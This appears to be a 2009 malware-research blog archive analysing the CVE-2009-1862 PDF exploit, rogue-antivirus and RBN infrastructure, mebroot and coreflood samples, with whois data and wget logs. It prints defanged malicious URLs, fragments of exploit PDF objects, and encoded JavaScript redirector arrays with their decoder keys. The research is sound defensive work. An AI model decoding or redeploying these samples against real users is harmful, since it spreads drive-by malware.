Secunia PSI (RC3) - memory corruption

Secunia PSI (Release Candidate 3) appears vulnerable to some memory corruption conditions.
This kind of issues are usually detected in release candidate. This kind of bugs, IMHO, may be used for support analysis based on binary diff using the historical releases of an application for obtain a delta of "critical" zone. But, again, it's only my opinion.

Anyway the following screen shots shown the JIT debugger (IDA Pro) behavior:

The first return point within the PSI process context



The second return point in the PSI.exe context



The third...



The fourth...



The fifth... I am able to count untill five :)



The dialog box about it:



Feedback are welcome.

UPDATE: the vendor report this issue as a bug releated to a deprecated PSI release.

something about CVE-2009-1862 PoC analysis

Well, strarting from hereEvil.pdf filename it's been decided to start an (yet another) analysis about this critical vulnerabilty.

From the proof of concept founded (http://www.milw0rm.com/exploits/9233):

begin 644 hereEvil.pdf
M)5!$1BTQ+C0*)"!;(#`N,3$Q,S,@+3`N,S(R-S4@,"XR,C$V.2`M
...

and so on... it's been decoded the TAR file above with the following result:

%PDF-1.4
%Çì�¢
1 0 obj
<< /Type /Catalog /Outlines 3 0 R /Pages 4 0 R /Dests 5 0 R /AcroForm 6 0 R /Names 7 0 R /Threads 8 0 R /PageLayout /SinglePage /ViewerPreferences << /PageDirection /L2R >>
>>
endobj
2 0 obj
<< /Creator (Scribus 1.3.3.13) /Producer (Scribus PDF Library 1.3.3.13) /Title <>
/Author <>
/Keywords <>
/CreationDate (D:20090711081156)
/ModDate (D:20090711081156)
/Trapped /False

and so on... it's been obtained a well know PDF format file.

Within this "evil" PDF file, some object encoding definitions are defined as following:

9 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [ 0.11133 -0.32275 0.22169 -1.01367 ]
/Resources << /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
/Length 263
/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>
stream

and anothe one:

29 0 obj
<< /Type /XObject /Subtype /Image /Width 272 /Height 345 /ColorSpace /DeviceRGB /BitsPerComponent 8 /Length 5280 /Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>
stream
...

Within the evil pdf file there are many more object defined in this manner.

The string:

/#46#6c#61#74#65#44#65#63#6f#64#65

stand for:

/FlateDecode

So from this point is possibile to proceed with usual analysis techniques.

something more about "Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execuion"

A good keyord for search info about new "big vendors" vulnerabilities is "roadmap" :). Sometimes is very usefull, I think. Opss! another "good bug hunter trick it's just been fulldisclosed".

http://blogs.msdn.com/excel/archive/2006/07/17/668544.aspx

Anyway... The CLSID for this threat are:

{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}

Check the following Registry entry:

and

Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx

KB article: http://support.microsoft.com/kb/973472

CVE: CVE-2009-1136

method affected: msDataSourceObject

PoC: http://en.securitylab.ru/poc/extra/382458.php

The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System

Finally after a few of days I have received my copy of:
The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System

Source: http://www.jbpub.com/covers/newlarge/1598220616.jpg

I think that this is the best book for the Windows rootkit development and countermeasures.

some nine-ball information - part 0.1

The following informations are intended as starting point for analyse "nine-ball".

Starting from rnw.kz domain:



querying the ns it's been obtained:



The last HTTP redirection stage (via malzilla):



Info for stopssse.info:

is static. 202.88.46.78.clients.your-server.de a logs collector for rbn ? - part 0.4

During some attempts to study RBN it's been found something of interesting. Let to start from the following rogue antivirus spreading URL:

http\\www.total-virusprotection.com

From robtex:

More interesting information for 92.241.176.220 are discovered asking, again via ROBTEX, other details:

That appears as a list of possible names server and hostname for other rogue antivirus domains. Returning to the original url http:\\www.total-virusprotection.com, it will tries to recognize the authoritative nameserver for the domain total-virusprotection.com. Again with robtex:

As shown in the screen shoot above, It seem the existence of two autorithative name server:

- ns1.total-virusprotection.com (89.149.254.55)
- ns2.total-virusprotection.com (78.46.88.202)

Using the last ip address as HTTP URL with a web browser appear the following "Index of/" page:

It's seem like a log repository folder. Moreover there is another folder named "logs" that contain the "csp" subfolder:

The log files that were analyzed contain information concerning the activities carried out by the web client. For instance the OS, the url visited, which FLASH stream the client has requested, as well which domain are requested by the clients and other activities. The following screen shots, shown three type of logs founded in the folders above (the IP address were specifically removed):

The content of a file within "index of/"


another one (again from "index of/")



another one but from /logs/csp folder

In the second screen shot above some of the IP address (removed) are related to other domains that are considered suspects, certain, however, are reported as RBN c&c. Also exploring the time line, some logs are bigger than others, as if to prove a massive campaign of possible malware propagation:

As always the inevitable screen shot to the particularities concerning ASn:

Reannouncment (date 2009-06-08) between AS8492 OBIT-AS Obit Telecommunications, St.Petersburg, Russia and AS24940 HETZNER-AS Hetzner Online AG RZ-Nuernberg

cerce

bulkbin.cn - russian business network related. it may be - part 0.3

It's been found that 174.133.202.181 (bulkbin.cn) it may be related to RBN. The following screen shot shown the rbn detection rules from emerginthreats.net updated list:



http://www.emergingthreats.net/rules/emerging-rbn.rules

bulkbin.cn - name server - part 0.2

The following pictures shown the name server for bulkbin and others (xgguys.com...):

whois 174.133.202.178

%rwhois V-1.5:003eff:00 whois.theplanet.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-THEPLANET-BLK-15
network:Auth-Area:174.132.0.0/15
network:Network-Name:TPIS-BLK-174-133-202-0
network:IP-Network:174.133.202.176/28
network:IP-Network-Block:174.133.202.176 - 174.133.202.191
network:Organization-Name:Anton Pershin
network:Organization-City:Moscow
network:Organization-State:vv
network:Organization-Zip:127254
network:Organization-Country:RUS
network:Description-Usage:customer
network:Server-Pri:ns1.theplanet.com
network:Server-Sec:ns2.theplanet.com
network:Tech-Contact;I:abuse@theplanet.com
network:Admin-Contact;I:abuse@theplanet.com
network:Created:20080623
network:Updated:20080624

%ok

generic unpacking of self-modifying, aggressive, packed binary programs

a good paper from Piotr Bania
http://piotrbania.com/all/articles/pbania-dbi-unpacking2009.pdf

from the paper It's been found the follwing excelent malware analysis web site:
https://aerie.cs.berkeley.edu

bulkbin.cn - strange AS - part 0.1

Hi there,

looking around It's was found some URLS that are related to bulkbin.cn

It was found the following malicious url (replace \ with / if you are interested):

http:\\azure.rr.nu\
http:\\adolas.passingg.as\
http:\\cemuryje.byinter.net\
http:\\costens.byinter.net\
http:\\colifit.redirect.hm\

For each of the URL above, there is a common point: a javascript redirector.

Specifically the following code, reports an abstract of the redirector code, the key for obtain clear HTML code and name of javascript redirector:

http:\\azure.rr.nu\
javascript redirector: yfoqklmcoxthgybyu.js
abstract of array that contains HTML redirector:
var str = ["206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "206", "211", "224", "138", "221", "222", "227", "214", "207", "167", "140", "217", "224", "207", "220", "208", "214", "217", "225", "164", "203", "223", "222", "217", "165", "138", "210", "207", "211", "209", "210", "222", "164", "138", "155", "218", "226", "165", "138", "225", "211", "206", "222", "210", "164", "138", "160", "154", "154", "218", "226", "165", "140", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "203", "204", "214", "207", "138", "225", "211", "206", "222", "210", "167", "140", "155", "154", "154", "143", "140", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "220", "168", "145", "147", "165", "119", "116", "206", "217", "205", "223", "215", "207", "216", "222", "152", "225", "220", "211", "222", "207", "146", "145", "166", "222", "206", "138", "211", "206", "167", "140", "208", "211", "220", "221", "222", "140", "168", "190", "210", "211", "221", "138", "211", "221"....
decoder key: ss = str[i] - 106;

http:\\adolas.passingg.as\
javascript redirector:tqewcmvdltvtunbrozlo.js
abstract of array that contains HTML redirector:
var str = ["713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "713", "718", "731", "645", "728", "729", "734", "721", "714", "674", "647", "724", "731", "714", "727", "715", "721", "724", "732", "671", "710", "730", "729", "724", "672", "645", "717", "714", "718", "716", "717", "729", "671", "645", "662", "725", "733", "672", "645", "732", "718", "713", "729", "717", "671", "645", "667", "661", "661", "725", "733", "672", "647", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "710", "711", "721", "714", "645", "732", "718", "713", "729", "717", "674", "647", "662", "661", "661", "650", "647", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "727", "675", "652", "654", "672", "626", "623", "713", "724", "712", "730", "722", "714", "723", "729", "659", "732", "727", "718", "729", "714", "653", "652", "673", "729", "713", "645", "718", "713", "674", "647", "715", "718", "727", "728", "729", "647", "675", "697", "717", "718", "728", "645", "718", "728",....
decoder key: ss = str[i] - 613;

http:\\cemuryje.byinter.net\
javascript redirector:iddcvesism.js
abstract of array that contains HTML redirector:
var str = ["558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "558", "563", "576", "490", "573", "574", "579", "566", "559", "519", "492", "569", "576", "559", "572", "560", "566", "569", "577", "516", "555", "575", "574", "569", "517", "490", "562", "559", "563", "561", "562", "574", "516", "490", "507", "570", "578", "517", "490", "577", "563", "558", "574", "562", "516", "490", "512", "506", "506", "570", "578", "517", "492", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "555", "556", "566", "559", "490", "577", "563", "558", "574", "562", "519", "492", "507", "506", "506", "495", "492", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "572", "520", "497", "499", "517", "471", "468", "558", "569", "557", "575", "567", "559", "568", "574", "504", "577", "572", "563", "574", "559", "498", "497", "518", "574", "558", "490", "563", "558", "519", "492", "560", "563", "572", "573", "574", "492", "520", "542", "562", "563", "573", "490", "563", "573",
decoder key: ss = str[i] - 458;

http:\\costens.byinter.net\
javascript redirector:dmozgpkfxiusbwf.js
abstract of array that contains HTML redirector:
var str = ["990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "990", "995", "1008", "922", "1005", "1006", "1011", "998", "991", "951", "924", "1001", "1008", "991", "1004", "992", "998", "1001", "1009", "948", "987", "1007", "1006", "1001", "949", "922", "994", "991", "995", "993", "994", "1006", "948", "922", "939", "1002", "1010", "949", "922", "1009", "995", "990", "1006", "994", "948", "922", "944", "938", "938", "1002", "1010", "949", "924", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "987", "988", "998", "991", "922", "1009", "995", "990", "1006", "994", "951", "924", "939", "938", "938", "927", "924", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "1004", "952", "929", "931", "949", "903", "900", "990", "1001", "989", "1007", "999", "991", "1000", "1006", "936", "1009", "1004", "995", "1006", "991", "930", "929", "950", "1006", "990", ...
decoder key: ss = str[i] - 890;

http:\\colifit.redirect.hm\
javascript redirector:cajhrwljjnwerpvjrriw.js
abstract of array that contains HTML redirector:
var str = ["882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "882", "887", "900", "814", "897", "898", "903", "890", "883", "843", "816", "893", "900", "883", "896", "884", "890", "893", "901", "840", "879", "899", "898", "893", "841", "814", "886", "883", "887", "885", "886", "898", "840", "814", "831", "894", "902", "841", "814", "901", "887", "882", "898", "886", "840", "814", "836", "830", "830", "894", "902", "841", "816", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "879", "880", "890", "883", "814", "901", "887", "882", "898", "886", "843", "816", "831", "830", "830", "819", "816", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "896", "844", "821", "823", "841", "795", "792", "882", "893", "881", "899", "891", "883", "892", "898", "828", "901", "896", "887", "898", "883", "822", "821", "842", "898", "882", "814", "887", "882", "843", "816", "884", "887", "896", "897", "898", "816", "844", "866", "886", "887", "897",
decoder key:ss = str[i] - 782;

The following screen shot shown the full decoded html redirector, common to all URLs above:

As shownthere is a spreading web site based on (IMHO) fake cgi script. Trying with malzilla to retrieve the malicious URL using only one "CGI" parameter it was discovered another redirection stage:

Making the GET HTTP request for simulate the redirection for the URL http:\\agentival.info\scan\download.php?said=10&ver=1.0.6 it appear a souspicious "install.exe" file.

From my submission to Threatexpert there wasn't info about binary:
http://www.threatexpert.com/report.aspx?md5=14077ad65fc28afa12b0f1b13c373f96

Only McAfee recognize the binary as" new malware".

A firt look about it with IDA shown some URL:

The ip address 174.133.202.181 is the DNS A record for bulkbin.cn

Some net info:
robtex response for 174.133.202.181:

robtex response for bulkbin.cn:

"AS? ???"

whois xgguy.com.theplanet.host ?
AS? it may be generated for the following reason:
the existence within the dns records of a host resolved only "in zone" like xgguy.com.theplanet.host.

A strange behavior is the following:
The only AS (AS21844) detected in the picture above for the 24 of April 2009 was been linked to the rest of the world in this manner:

While on 6th of May 2009, there was a route withdrawal with all others so:

Some notes:
- I know that may depend by a misconfiguration or a leak routing sources data used by BGPlay.
- AS21844 THEPLANET-AS2 ThePlanet.com Internet Services, Inc. it may be a backup AS.

Feedback are welcome.

an irc server - part 0.1

Hi there,
during a survey activities it was been found the following irc server:

main.updateserver.cn (67.202.89.34)

Searching by google the only infornatuib about is from threatexpert.com:
http://www.threatexpert.com/report.aspx?md5=f699946ecde2c669adfbbaf4f019fc03
it seems related to pushbot.

The following mirc screen shots show the irc server banner:



whois:

$ whois 67.202.89.34

OrgName: NoZone, Inc.
OrgID: NOZON
Address: 350 E. Cermak Rd.
Address: Suite 240
City: Chicago
StateProv: IL
PostalCode: 60616
Country: US
ReferralServer: rwhois://rwhois.steadfast.net:4321
NetRange: 67.202.64.0 - 67.202.127.255
CIDR: 67.202.64.0/18
OriginAS: AS32748
NetName: STEADFAST-3
NetHandle: NET-67-202-64-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.STEADFAST.NET
NameServer: NS2.STEADFAST.NET
NameServer: NS3.STEADFAST.NET
NameServer: NS4.STEADFAST.NET
Comment: Please submit all reports of abuse to
Comment: abuse@steadfast.net. Reports sent to other
Comment: addresses will not be processed.
RegDate: 2007-08-09
Updated: 2008-07-15
RAbuseHandle: ABUSE959-ARIN
RAbuseName: Steadfast Networks Abuse Department
RAbusePhone: +1-312-602-2689
RAbuseEmail: abuse@steadfast.net
RNOCHandle: NOG3-ARIN
RNOCName: Steadfast Networks Network Operations Center
RNOCPhone: +1-312-602-2689
RNOCEmail: noc@steadfast.net
RTechHandle: NOG3-ARIN
RTechName: Steadfast Networks Network Operations Center
RTechPhone: +1-312-602-2689
RTechEmail: noc@steadfast.net
OrgAbuseHandle: ABUSE959-ARIN
OrgAbuseName: Steadfast Networks Abuse Department
OrgAbusePhone: +1-312-602-2689
OrgAbuseEmail: abuse@steadfast.net
OrgNOCHandle: NOG3-ARIN
OrgNOCName: Steadfast Networks Network Operations Center
OrgNOCPhone: +1-312-602-2689
OrgNOCEmail: noc@steadfast.net
OrgTechHandle: NOG3-ARIN
OrgTechName: Steadfast Networks Network Operations Center
OrgTechPhone: +1-312-602-2689
OrgTechEmail: noc@steadfast.net
# ARIN WHOIS database, last updated 2009-05-21 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Found a referral to rwhois.steadfast.net:4321.
%rwhois V-1.0,V-1.5:00090h:00 manage.steadfast.net (Ubersmith RWhois Server V-1.0)
autharea=67.202.64.0/18
xautharea=67.202.64.0/18
network:Class-Name:network
network:Auth-Area:67.202.64.0/18
network:ID:NET-3622.67.202.88.0/22
network:Network-Name:IP Pool
network:IP-Network:67.202.88.0/22
network:IP-Network-Block:67.202.88.0 - 67.202.91.255
network:Org-Name:Verity LLC
network:Street-Address:8622 Merlin Dr.
network:City:Houston
network:State:TX
network:Postal-Code:77055
network:Country-Code:US
network:Tech-Contact:MAINT-3622.67.202.88.0/22
network:Created:20080714202141000
network:Updated:20080714202141000
network:Updated-By:admin@steadfast.net
network:POC-Name:Steadfast Networks
network:POC-Email:admin@steadfast.net
network:POC-Phone:312-602-2689
network:Tech-Name:Steadfast Networks
network:Tech-Email:admin@steadfast.net
network:Tech-Phone:312-602-2689

Cymru whois:
AS |IP |BGPPrefix |CC |Allocated|ASName
32748 |67.202.89.34 |67.202.64.0/19 |US |2007-08-09|STEADFAST-NoZone,Inc.

another approach - trying to analyze mebroot (torpig) - part 0.6

Starting from x53d03e99cfbfaa0df3695c27b2b5f364 it was been detect a pedantic anti debugging technique (IMHO). Specifically in this case the authors has used a pushf/popf tricks. Since the pushf popf anti debugging technique it seem require the writing of a custom exception handler for handling the ONE_STEP exception, and since I don't want use this approach for a trojan that is yet fully documented on the net, I decide to start with a classical analysis tools such as filemon (sysinternals.com). The following screen shots shown the creation of two file (one .exe and one .dll) named as 31.tmp and 32.tmp:

creation of 31.tmp (.exe component)
md5: 0x4c57e1af6d0dff3a64c3f31a1646fb2a
http://www.threatexpert.com/report.aspx?md5=4c57e1af6d0dff3a64c3f31a1646fb2a



creation of 32.tmp (.dll component)
md5:0xfee2385af796a198a7822ad7d0d7ad88
http://www.threatexpert.com/report.aspx?md5=fee2385af796a198a7822ad7d0d7ad88

During analysis with fmon, it was shown that the .exe, (created and launched by spreader) component drop the .dll component. The dll, as usually, is used by svchost.exe.

gumblar.cn and martuz.cn are dead

robtex for gumblar.cn:

robtex for martuz.cn:

afcore - trying to analyze coreflood - part 0

md5:0x9054ce104254794fb0511d18bbe40ef5

VirusTotal:
http://www.virustotal.com/reanalisis.html?caf6f942e79dcaea76c2792959d52768

ThreatExpert:
http://www.threatexpert.com/report.aspx?md5=9054ce104254794fb0511d18bbe40ef5

Some net related info:

threatexpert analysis has detected HTTP requests for the following URL:
http://secure.termobite.ws/forum/f7810f/44513dd/7c2891f/4/22b332c

robtex:

whois:

netcraft:

Some notes:

At this time the URL appears as not more active. Searching with Google the URL seems active from 2008 and is present within some reports about other afcore variants.

Carrying out some tests using URL has been identified a redirection as shown in the following (note that the following behavior is the same for browser and wget as well curl. the user-agent is not impotant):

$ wget http://secure.termobite.ws/forum/

--xx:xx:xx-- http://secure.termobite.ws/forum
=> `forum'
Resolving secure.termobite.ws... 209.85.100.7
Connecting to secure.termobite.ws|209.85.100.7|:80..
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://node3.border.znet/forum/ [following
--xx:xx:xx-- http://node3.border.znet/forum/
=> `index.html'
Resolving node3.border.znet... failed: Unknown host.

Is node3.border.znet an "internal" coreflood node ? Trying to joke with domain name and tld it's been found this: node3.border.znet obviously doesn't exist. but node3.borderz.net exist. So what about ?

An HTTP GET request for node3.borderz.net redirect at the following web site:
http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark

The log of wget:

$ wget node3.borderz.net
--xx:xx:xx-- http://node3.borderz.net/
=> `index.html'
Resolving node3.borderz.net... 82.98.86.177
Connecting to node3.borderz.net|82.98.86.177|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark [following]
--xx:xx:xx-- http://sedoparking.com/search/registrar.php?domain=borderz.net&registrar=sedopark
=> `registrar.php@domain=borderz.net&registrar=sedopark'
Resolving sedoparking.com... 82.98.86.180
Connecting to sedoparking.com|82.98.86.180|:80... connected.
HTTP request sent, awaiting response... 200 OK
Cookie coming from sedoparking.com attempted to set domain to borderz.net
Length: unspecified [text/html]

[ <=> ] 81,810 53.44K/s

xx:xx:xx (53.34 KB/s) - `registrar.php@domain=borderz.net&registrar=sedopark' saved [81810]

sedoparking.com\search\registrar.php?domain=borderz.net&registrar=sedopark

Is coreflood related to financial stuff ? YES.
in the screen shot above we can see scam links about financial services.

too many strange coincidences. but it may be a coincidence and nothing more

feedback are welcome.

pushfd popfd - SEH and anti-debugging

http://www.openrce.org/forums/posts/445#1443

first look - trying to analyze mebroot (torpig) - part 0.5

My submission to threatexpert.com for md5:0x53d03e99cfbfaa0df3695c27b2b5f364 (sinowal/mebroot and i hope torpig related):
http://www.threatexpert.com/report.aspx?md5:0x53d03e99cfbfaa0df3695c27b2b5f364

How virustotal.com detect 0x53d03e99cfbfaa0df3695c27b2b5f364:
http://www.virustotal.com/analisis/65ccef31523490ed798110dab5bf884e

What's shown with ArmInline for 0x53d03e99cfbfaa0df3695c27b2b5f364 run by ollydbg:

It seems packed but not UPXed. It may been used Armadillo o something like. As showed there are a lot of int 3 (usually is an anti debugging technique marker)

got it ? - trying to analyze mebroot (torpig) - part 0.4

It's been discovered using an alias for mebroot (sinowal) as search keyword.
So trying to retrieve one of the latest it was been discovered the following:

md5: 0xba1f006b05e898c0e4a61458cd981870
or
md5: 0x53d03e99cfbfaa0df3695c27b2b5f364

URL:hxxp://----------.----/cgi-bin/index.cgi?ECVCEzzEZzZZsZrZZMzClEkuuMZEZZZZZZZZZMMkVkuukZZZZzZkZlZZZZZZZZzOZ

At this time the URL , like a fast bulk place, doesn't provide anything.

Feedback are welcome.

AS whois (cymru whois service) script

This is a simple POC bash script for retrieving AS info (ASn and prefix) from team-cymru whois service for a given IP address. It's created for work in separated folder and the input file is a simple IP address list file. For each IP, the script creates a separated files (named with IP) and global unique log file where are saved all responses.

So for a faster and better using following this steps:

- create a directory
- create a file that contains your activity ip addresses
- copy the script and ip list within the directory
- run the script



Output example:

a "capture-server" night - a different night without IDA

This is the first step of the installation for capture-client/server project by hpc project. Tank you very much to "security watch" owner for his suggestions.

After a couple of hours for install and finding stuff needed, this is the time for "yet another" screen shots:

Behind the scene a good starting guide web site for installing and using HPC Capture Server: http://www.emre.de/wiki/Capture-HPC

still attempts for binaries retriving - trying to analyze mebroot (torpig) - part 0.3

I'm still search for URL with a sort of binary to analyze. I'm evaluating to looking for another URL for get mebroot binaries. From the URL reported by malwaredomainlist.com I can't get anything then strange URL.
I get a Symantec report related to 15min.it where are shown URL for download binaries stuff. But seems not more available.

http://safeweb.norton.com/report/show?name=15min.it

Feedback are welcome.